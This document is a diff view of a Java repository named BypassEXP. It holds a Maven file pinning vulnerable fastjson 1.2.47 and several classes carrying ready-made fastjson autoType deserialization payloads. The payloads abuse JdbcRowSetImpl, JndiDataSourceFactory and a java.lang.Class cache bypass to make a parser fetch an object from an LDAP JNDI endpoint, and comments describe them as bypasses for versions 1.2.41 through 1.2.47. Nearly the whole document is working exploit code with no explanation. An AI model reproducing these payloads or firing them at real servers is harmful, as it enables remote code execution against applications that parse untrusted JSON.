| FazBrowse GitHub Viewer | Trending | | Home |
| Tools: [Download Repo ZIP] [Original HTTPS Page] |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,48 @@ | |||
| 1 | + <?xml version="1.0" encoding="UTF-8"?> | ||
| 2 | + <project xmlns="http://maven.apache.org/POM/4.0.0" | ||
| 3 | + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | ||
| 4 | + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> | ||
| 5 | + <modelVersion>4.0.0</modelVersion> | ||
| 6 | + | ||
| 7 | + <groupId>org.example</groupId> | ||
| 8 | + <artifactId>BypassEXP</artifactId> | ||
| 9 | + <version>1.0-SNAPSHOT</version> | ||
| 10 | + <dependencies> | ||
| 11 | + <dependency> | ||
| 12 | + <groupId>com.unboundid</groupId> | ||
| 13 | + <artifactId>unboundid-ldapsdk</artifactId> | ||
| 14 | + <version>4.0.9</version> | ||
| 15 | + </dependency> | ||
| 16 | + <dependency> | ||
| 17 | + <groupId>commons-io</groupId> | ||
| 18 | + <artifactId>commons-io</artifactId> | ||
| 19 | + <version>2.5</version> | ||
| 20 | + </dependency> | ||
| 21 | + <dependency> | ||
| 22 | + <groupId>com.alibaba</groupId> | ||
| 23 | + <artifactId>fastjson</artifactId> | ||
| 24 | + <version>1.2.47</version> | ||
| 25 | + </dependency> | ||
| 26 | + <dependency> | ||
| 27 | + <groupId>commons-codec</groupId> | ||
| 28 | + <artifactId>commons-codec</artifactId> | ||
| 29 | + <version>1.12</version> | ||
| 30 | + </dependency> | ||
| 31 | + <dependency> | ||
| 32 | + <groupId>commons-collections</groupId> | ||
| 33 | + <artifactId>commons-collections</artifactId> | ||
| 34 | + <version>3.2.1</version> | ||
| 35 | + </dependency> | ||
| 36 | + <!-- https://mvnrepository.com/artifact/org.mybatis/mybatis --> | ||
| 37 | + <dependency> | ||
| 38 | + <groupId>org.mybatis</groupId> | ||
| 39 | + <artifactId>mybatis</artifactId> | ||
| 40 | + <version>3.4.0</version> | ||
| 41 | + </dependency> | ||
| 42 | + </dependencies> | ||
| 43 | + <properties> | ||
| 44 | + <maven.compiler.source>8</maven.compiler.source> | ||
| 45 | + <maven.compiler.target>8</maven.compiler.target> | ||
| 46 | + </properties> | ||
| 47 | + | ||
| 48 | + </project> | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,9 @@ | |||
| 1 | + import com.alibaba.fastjson.JSON; | ||
| 2 | + | ||
| 3 | + // 对于 Fastjson 1.2.41 的版本,失败的 EXP | ||
| 4 | + public class FailedEXP { | ||
| 5 | + public static void main(String[] args) { | ||
| 6 | + String payload ="{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1234/ExportObject\",\"autoCommit\":\"true\" }"; | ||
| 7 | + JSON.parse(payload); | ||
| 8 | + } | ||
| 9 | + } | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,11 @@ | |||
| 1 | + import com.alibaba.fastjson.JSON; | ||
| 2 | + import com.alibaba.fastjson.parser.ParserConfig; | ||
| 3 | + | ||
| 4 | + // Fastjson 1.2.41 版本的绕过 | ||
| 5 | + public class SuccessBypassEXP_41 { | ||
| 6 | + public static void main(String[] args) { | ||
| 7 | + ParserConfig.getGlobalInstance().setAutoTypeSupport(true); | ||
| 8 | + String payload ="{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\",\"dataSourceName\":\"ldap://127.0.0.1:1234/ExportObject\",\"autoCommit\":\"true\" }"; | ||
| 9 | + JSON.parse(payload); | ||
| 10 | + } | ||
| 11 | + } | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,11 @@ | |||
| 1 | + import com.alibaba.fastjson.JSON; | ||
| 2 | + import com.alibaba.fastjson.parser.ParserConfig; | ||
| 3 | + | ||
| 4 | + // Fastjson 1.2.42 版本的绕过 | ||
| 5 | + public class SuccessBypassEXP_42 { | ||
| 6 | + public static void main(String[] args) { | ||
| 7 | + ParserConfig.getGlobalInstance().setAutoTypeSupport(true); | ||
| 8 | + String payload ="{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"ldap://127.0.0.1:1234/ExportObject\",\"autoCommit\":\"true\" }"; | ||
| 9 | + JSON.parse(payload); | ||
| 10 | + } | ||
| 11 | + } | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,11 @@ | |||
| 1 | + import com.alibaba.fastjson.JSON; | ||
| 2 | + import com.alibaba.fastjson.parser.ParserConfig; | ||
| 3 | + | ||
| 4 | + // Fastjson 1.2.41 版本的绕过 | ||
| 5 | + public class SuccessBypassEXP_43 { | ||
| 6 | + public static void main(String[] args) { | ||
| 7 | + ParserConfig.getGlobalInstance().setAutoTypeSupport(true); | ||
| 8 | + String payload ="{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{,\"dataSourceName\":\"ldap://localhost:1234/Exploit\", \"autoCommit\":true}"; | ||
| 9 | + JSON.parse(payload); | ||
| 10 | + } | ||
| 11 | + } | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,12 @@ | |||
| 1 | + import com.alibaba.fastjson.JSON; | ||
| 2 | + import com.alibaba.fastjson.parser.ParserConfig; | ||
| 3 | + | ||
| 4 | + // Fastjson 1.2.41 版本的绕过 | ||
| 5 | + public class SuccessBypassEXP_45 { | ||
| 6 | + public static void main(String[] args) { | ||
| 7 | + ParserConfig.getGlobalInstance().setAutoTypeSupport(true); | ||
| 8 | + String payload ="{\"@type\":\"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory\"," + | ||
| 9 | + "\"properties\":{\"data_source\":\"ldap://localhost:1234/Exploit\"}}"; | ||
| 10 | + JSON.parse(payload); | ||
| 11 | + } | ||
| 12 | + } | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,11 @@ | |||
| 1 | + import com.alibaba.fastjson.JSON; | ||
| 2 | + import com.alibaba.fastjson.parser.ParserConfig; | ||
| 3 | + | ||
| 4 | + public class SuccessBypassEXP_47 { | ||
| 5 | + public static void main(String[] argv){ | ||
| 6 | + String payload = "{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}," | ||
| 7 | + + "\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," | ||
| 8 | + + "\"dataSourceName\":\"ldap://localhost:1234/Exploit\",\"autoCommit\":true}}"; | ||
| 9 | + JSON.parse(payload); | ||
| 10 | + } | ||
| 11 | + } | ||
| Back | FazBrowse Home | New Git URL |
0 commit comments